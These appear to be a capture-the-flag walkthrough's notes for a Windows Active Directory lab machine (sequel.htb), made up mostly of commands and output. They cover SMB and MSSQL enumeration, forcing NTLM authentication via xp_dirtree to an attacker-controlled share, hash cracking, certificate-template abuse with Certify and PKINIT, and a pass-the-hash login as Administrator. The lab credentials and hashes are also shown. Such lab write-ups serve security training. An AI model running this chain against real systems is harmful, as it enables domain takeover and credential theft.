Scanning
> TARGET=10.129.117.21 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-02-27 04:30:41Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-27T04:32:19+00:00; +7h59m54s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
| SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-27T04:32:18+00:00; +7h59m54s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
| SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-02-26T17:37:34
| Not valid after: 2053-02-26T17:37:34
| MD5: 3189c5c21cffae471312d7d6c1aeffa6
| SHA-1: b1c81fd5be77d26a59eed105097d70626c695ae3
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-02-27T04:32:19+00:00; +7h59m54s from scanner time.
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
| SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
|_ssl-date: 2023-02-27T04:32:19+00:00; +7h59m54s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-02-27T04:32:20+00:00; +7h59m54s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:20:35
| Not valid after: 2023-11-18T21:20:35
| MD5: 869f7f54b2edff74708d1a6ddf34b9bd
| SHA-1: 742ab4522191331767395039db9b3b2e27b6f7fa
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49698/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49702/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
54350/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
kerberos enum
> kerbrute userenum -d sequel.htb --dc 10.129.117.21 /usr/share/wordlists/kerberos_enum_userlists/A-Z.Surnames.txt
smb share
smbclient -L \\\\10.129.117.21 -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
smbclient \\\\10.129.117.21\\Public -N
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (21.8 KiloBytes/sec) (average 21.8 KiloBytes/sec)
- db credential
PublicUser:GuestUserCantWrite1
For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with user PublicUser and password GuestUserCantWrite1 .
mssql
- connect to mssql using the above credential
> impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@10.129.117.21
SQL> enable_xp_cmdshell
[-] ERROR(DC\SQLMOCK): Line 105: User does not have permission to perform this action.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(DC\SQLMOCK): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(DC\SQLMOCK): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL> xp_cmdshell
[-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
xp_dirtree can be used to list files, use this list list a remote file share of our control so that the ntlm hash can be sniffed using responder
SQL> exec master.dbo.xp_dirtree '\\<ip>\dfasdf'
> responder -I tun0
[SMB] NTLMv2-SSP Client : 10.129.117.21
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:4189e898a57961d3:87C71385E26785F2035C9C2C5C04BA96:01010000000000000013DC44FC49D901488A3EB20645F94A0000000002000800450032005A00530001001E00570049004E002D0032004A004C0034004C0046003200480049004D004A0004003400570049004E002D0032004A004C0034004C0046003200480049004D004A002E00450032005A0053002E004C004F00430041004C0003001400450032005A0053002E004C004F00430041004C0005001400450032005A0053002E004C004F00430041004C00070008000013DC44FC49D9010600040002000000080030003000000000000000000000000030000074C46AD20107C4E66712E50A1E8B6CC1CF6DCFDA0749DDB7E91819A2F16B85390A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00320031000000000000000000
- crack the hash of sql_svc:
REGGIE1234ronnie
> hashcat.exe --force -m 5600 hash.txt rockyou.txt
> evil-winrm -u sql_svc -p REGGIE1234ronnie -i sequel.htb
user: ryan.cooper
- enum on filesystem and browse to an error log backup
*Evil-WinRM* PS C:\sqlserver\logs> ls
Directory: C:\sqlserver\logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK
- credential found:
NuclearMosquito3
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
- login as ryan.cooper to get the user flag
pe
PS C:\Users\Ryan.Cooper\Documents> .\certify.exe find /vulnerable
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
- request the vulnerable cert as admin
> Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
- copy the generated .pem certificate output and save to a file, then convert it to .pfx format
> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
> python3 /root/tools/PKINITtools/gettgtpkinit.py -cert-pfx cert.pfx -dc-ip 10.129.117.21 sequel.htb/Administrator admin.ccache
2023-02-27 01:16:19,092 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2023-02-27 01:16:19,245 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2023-02-27 01:16:27,755 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2023-02-27 01:16:27,756 minikerberos INFO dd4810321e31ea6b1bcfe63076b3ff12909a8952b0f2fc60d11c2a00b8f81a8b
INFO:minikerberos:dd4810321e31ea6b1bcfe63076b3ff12909a8952b0f2fc60d11c2a00b8f81a8b
2023-02-27 01:16:27,768 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
> export KRB5CCNAME=admin.ccache
> python3 /root/tools/PKINITtools/getnthash.py sequel.htb/Administrator -k dd4810321e31ea6b1bcfe63076b3ff12909a8952b0f2fc60d11c2a00b8f81a8b
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a52f78e4c751e5f5e17e1e9f3e58f4ee
- connect to fetch the root flag
> evil-winrm -u Administrator -i sequel.htb -H a52f78e4c751e5f5e17e1e9f3e58f4ee
